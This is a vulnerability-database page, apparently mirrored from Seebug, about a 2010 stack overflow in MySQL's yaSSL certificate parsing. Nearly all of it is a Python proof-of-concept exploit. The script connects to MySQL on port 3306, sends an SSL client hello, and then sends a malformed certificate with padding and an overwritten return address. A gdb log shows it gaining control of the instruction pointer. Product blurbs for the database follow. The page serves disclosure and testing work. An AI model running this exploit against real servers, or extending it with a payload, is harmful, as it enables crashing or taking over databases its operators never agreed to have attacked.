Lucene search
K

MySQL yaSSL库证书解析栈溢出漏洞

🗓️ 27 Jan 2010 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 20 Views

MySQL yaSSL certificate parsing stack overflow vulnerabilit

Code

                                                #!/usr/bin/env python
#
# Use this code at your own risk. Never run it against a production system.
# 
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.

"""
Usage: mysql_overflo1.py localhost

MySQL yassl cert parsing stack overflow

Debug session on 5.5.0-m2

suse11:~ # gdb -q
(gdb) att 5542
Attaching to process 5542
Reading symbols from /var/mysql/libexec/mysqld...cdone.
...
0xffffe430 in __kernel_vsyscall ()
(gdb) c
Continuing.

Program received signal SIGSEGV, Segmentation fault.
[Switching to Thread 0xb6bbab90 (LWP 5545)]
0x41424344 in ?? ()
(gdb)

"""
import os
import getopt
import sys
import socket
import time
import telnetlib
import struct
import base64
import random

class theexploit:
	def __init__(self,host):
		self.host = host
        	self.port = 3306 

	def gettcpsock(self):
		sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
		return sock
 
	def int2berlen(self,i):
        	e=self.int2ber(i, signed=0)
        	if i <= 127:
                	return e
        	else:
                	l=len(e)
                	return chr(0x80|l) + e

	def int2ber(self,i, signed=1):
        	encoded=''
        	while ((signed and (i>127 or i<-128))
                	or (not signed and (i>255))):
                	encoded=chr(i%256)+encoded
                	i=i>>8
        	encoded=chr(i%256)+encoded
        	return encoded
 
	def big_endian_24(self, length):
        	l1 = (length & 0xff0000) >> 16;
                l2 = (length & 0xff00) >> 8;
                l3 = length & 0xff;
                size = chr(l1) + chr(l2) + chr(l3)
		return size

	def attack_mysql(self):
		sock = self.gettcpsock()
		sock.connect((self.host, self.port))
		#sock.set_timeout(30.0)		


		print "press any key"
		sys.stdin.readline()
		
		s=sock.recv(8000)
		print s

		s ="\x20\x00\x00\x01\x85\xae\x03\x00\x00\x00\x00\x01\x08\x00\x00\x00"
		s+="\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
                s+="\x00\x00\x00\x00"
                s+="\x16\x03\x01\x00\x60\x01\x00\x00\x5c\x03\x01\x4a\x92\xce\xd1\xe1"
                s+="\xab\x48\x51\xc8\x49\xa3\x5e\x97\x1a\xea\xc2\x99\x82\x33\x42\xd5"
                s+="\x14\xbc\x05\x64\xdc\xb5\x48\xbd\x4c\x11\x55\x00\x00\x34\x00\x39" 
                s+="\x00\x38\x00\x35\x00\x16\x00\x13\x00\x0a\x00\x33\x00\x32\x00\x2f"
                s+="\x00\x66\x00\x05\x00\x04\x00\x63\x00\x62\x00\x61\x00\x15\x00\x12"
                s+="\x00\x09\x00\x65\x00\x64\x00\x60\x00\x14\x00\x11\x00\x08\x00\x06"
                s+="\x00\x03\x02\x01\x00"

		sock.sendall(s)
		print "Sent SSL_CLIENT_HELLO"
		
		sock.sendall(self.make_overflow())
		print "Sent SSL_CLIENT_CERTIFICATE"
		sock.close()

 
    	def run(self):
		self.attack_mysql()
		return 0

	def make_overflow(self):
		retaddr=0x41424344
		cn=""
                cn += "\x00"* 1062
		cn+=struct.pack ("<L",retaddr)*6 
		#cn += "\x40" * 100
		#cn += "\xcc"*100
		#cn += "\x40" * 100

		cert = "\x2a\x86\x00\x84" + struct.pack(">L",len(cn)) + cn

		cert = "\x30\x82\x01\x01\x31\x82\x01\x01\x30\x82\x01\x01\x06\x82\x00\x02" + cert
		
		cert ="\xa0\x03\x02\x01\x02\x02\x01\x00\x30\x0d\x06\x09\x2a\x86\x48\x86\xf7\x0d\x01\x01\x04\x05\x00" + cert

		cert = "\x30" + self.int2berlen(len(cert)) + cert
		cert = "\x30" + self.int2berlen(len(cert)) + cert
	
		cert1 = self.big_endian_24(len(cert)) + cert
		certs = self.big_endian_24(len(cert1)) + cert1
	
		handshake = "\x0b" +  self.big_endian_24(len(certs)) + certs
		msg = "\x16\x03\x01" + struct.pack(">H",len(handshake)) + handshake
		
		
		return msg 

if __name__=="__main__":
    	app = theexploit(sys.argv[1])
	app.run()

                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 Jan 2010 00:00Current
6.9Medium risk
Vulners AI Score6.9
20